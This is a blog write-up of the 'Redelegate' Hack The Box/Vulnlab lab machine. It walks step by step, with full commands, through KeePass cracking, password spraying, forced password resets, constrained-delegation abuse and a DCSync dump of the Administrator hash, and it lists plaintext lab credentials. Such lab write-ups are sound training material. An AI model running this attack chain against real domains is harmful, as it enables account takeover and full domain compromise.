Skip to main content
HashnodeREAPSEC

Command Palette

Search for a command to run...

Redelegate

(Hard , Windows , Vulnlab Machine)

Updated
Redelegate
M
MOHIT SINGH PAPOLA
Part of seriesHTB MACHINES

OVERVIEW

So we are given IP of the machine let’s scan it using Nmap

ENUMERATION

So we see that Anonymous Login is allowed in FTP so let’s just dump all its contents and directories and also don’t forget to add the domain and DC name into /etc/hosts

To dump the content inside FTP server using anonymous login:

wget -m --no-passive ftp://anonymous:anonymous@10.129.234.50

You will get all the contents on your working directory

Let’s analyze each file one by one
So on analyzing CyberAudit.txt and TrainingAgenda.txt

Friday 18th October | 11.30 - 13.30 - 7 attendees
"Weak Passwords" - Why "SeasonYear!" is not a good password

So only 7 attendees means people are still using SeasonYear! type passwords and we also saw another Shared.kdbx file which is a Keepass 2.x file of which we could get its password by using John The Ripper tools as

keepass2john Shared.kdbx > keepass.hash

john --wordlist=/path-to-your-wordlist

Since we know that People are using SeasonYear! type passwords so let’s quickly create a custom wordlist pass.txt of these type of passwords according to seasons

SeasonYear!
Summer2024!
Winter2024!
Fall2024!
Spring2024!
Autumn2024!

NOTE: we used the year 2024 because its 2024 in the CyberAudit.txt as we saw above and if you try to crack the Shared.kdbx file using rockyou.txt then it will take ages to complete

now let’s try to crack Shared.kdbx file password using the above wordlist

john --wordlist=/path-to-pass.txt

So we got the password successfully and now let’s use kpcli to login into the file Shared.kdbx

kpcli --kdb=Shared.kdbx

Now since you are inside , now enumerate the directories using ls , cd commands and to see particular passwords use the show command such as show 0 , show 1 and so on….

The passwords are hidden under a red flag so to see them just copy them and paste somewhere or in a text editor

On enumerating the Shared.kdbx completely and getting all the passwords make a list of users and passwords differently to enumerate which service is working for which credentials

Payroll
Timesheet
Administrator
FTPUser
SQLGuest
WordPress Panel

SeasonYear!
Summer2024!
Winter2024!
Fall2024!
Spring2024!
Autumn2024!
cVkqz4bCM7kJRSNlgx2G
hMFS4I0Kj8Rcd62vqi5X
22331144
Spdv41gg4BlBgSYIW1gF
SguPZBKdRyxWzvXRWy6U
zDPBpaF4FywlqIv11vii
cn4KOEgsHqvKXPjEnSD9

Now we can use netexec to brute force the creds among services like FTP , SMB , MSSQL , LDAP , WINRM etc.

So none of them worked in services above except MSSQL

nxc mssql 10.129.234.50 -u users.txt -p pass.txt --continue-on-success --local-auth

Now I used mssqlclient.py to enumerate the sql server but couldn’t get any useful there to get us some lead so then i thought about —rid-brute using the MSSQL creds we got

nxc mssql 10.129.234.50 -u 'SQLGuest' -p 'zDPBpaF4FywlqIv11vii' --rid-brute --local-auth

Now there is a possibility of password reuse with the new users we got so let’s brute force the new users with our earlier pass.txt

nxc smb 10.129.234.50 -u new_users.txt -p pass.txt --continue-on-success

Here we go we got Marie.Curie user but we are not able to get a foothold through Marie.Curie and its shares are also not much of any use so let’s run bloodhound to see what is happening.

bloodhound-python -u Marie.Curie -p 'REDACTED' -d redelegate.vl -ns 10.129.234.50 -c ALL --zip

Now on seeing High Value Target from Owned Principles we see

Marie.Curie -> Member of HelpDesk@Redelegate.vl -> force change password -> Helen.Frost@Redelegate.vl

So that means we can change the password of Helen.Frost user and then can get a shell/foothold as Helen.Frost

bloodyAD -d redelegate.vl -u Marie.Curie -p 'REDACTED' --host dc.redelegate.vl set password Helen.Frost 'Password123!'

Password is changed successfully now let’s see if we can get the shell or not

Yep we can, So let’s use evil-winrm to get the shell and grab the user flag

USER FLAG

PRIVILEGE ESCALATION

Let’s see what privileges do we got by whoami /priv

SeMachineAccountPrivilege and SeEnabledDelegationPrivilege is Enabled
But we can’t either add machine account or dnsrecord as:

MachineAccountQuota is 0 and INSUFF_ACCESS_RIGHTS for adding DNS Record into a domain
(Usually this would be done through Marie.Curie Creds in order to Obtain NTLM HASH through responder but i am just showing that it is not allowed to add DNS Record in the domain irrespective of any user)

So let’s find another method to escalate privileges
Now In Bloodhound we saw that user Helen.Frost has Group Delegated Object Control

So, Helen.Frost user account is a member of the IT group, which has the GenericAll ACL on the FS01$ machine account.
We know we cannot add a DNS record and machine account from our previous enumeration. So we cannot configure unconstrained delegation because we need to force the machine to craft a Kerberos ticket, which isn't possible with an IP Address only; it requires SPN and DNS A record.

However, we can configure the FS01$ machine account to perform a full S4U2self + S4U2proxy (Constrained Delegation) attack on the DC$ machine account and use that service ticket to perform a DCSync attack

Since we have GenericAll on FC01$ machine account we can force change its password using TGT of Helen.Frost

getTGT.py redelegate.vl/helen.frost:'Password123!'

export KRB5CCNAME=helen.frost.ccache

bloodyAD -k --host 'dc.redelegate.vl' set password 'FS01$' 'Newpassword123!'

Now let’s configure FS01$ for TRUSTED_TO_AUTH_FOR_DELEGATION and AllowedToDelegateTo properties.
Let’s begin configuring

bloodyAD -d redelegate.vl -k --host "dc.redelegate.vl" add uac FS01$ -f TRUSTED_TO_AUTH_FOR_DELEGATION

bloodyAD -d redelegate.vl -k --host "dc.redelegate.vl" set object FS01$ msDS-AllowedToDelegateTo -v cifs/dc.redelegate.vl

Now take FS01$ TGT similarly like Helen.Frost

Now get Service Ticket and impersonate dc

getST.py -k -no-pass -spn cifs/dc.redelegate.vl -impersonate dc redelegate.vl/FS01$

export KRB5CCNAME=dc@cifs_dc.redelegate.vl@REDELEGATE.VL.ccache

Now let’s perform DC-Sync attack and grab Administrator Hash

secretsdump.py -k -no-pass dc.redelegate.vl -just-dc-user Administrator

We got the hash now use it to get a shell and grab the root flag

ROOT FLAG

WE FINALLY DID IT !!!! CHALLENGE SOLVED !!

For Any Query Or Problem Either Leave A Comment Or Contact At reapsec.com

THANKS FOR READING !!!

#redelegate#constrained-delegation#hard-machine#reapsec#hackthebox#vulnlab#hackthebox-machine#walkthroughs#write-up

Comments

Join the discussion

No comments yet. Be the first to comment.

HTB MACHINES

Part 6 of 10

In This Series I Will Provide Full Walkthrough Of Retired Machine On Hack The Box !

Up next

Authority

(Medium, Windows)

More from this blog

R

REAPSEC

27 posts

YOU REAP WHAT YOU SOW!!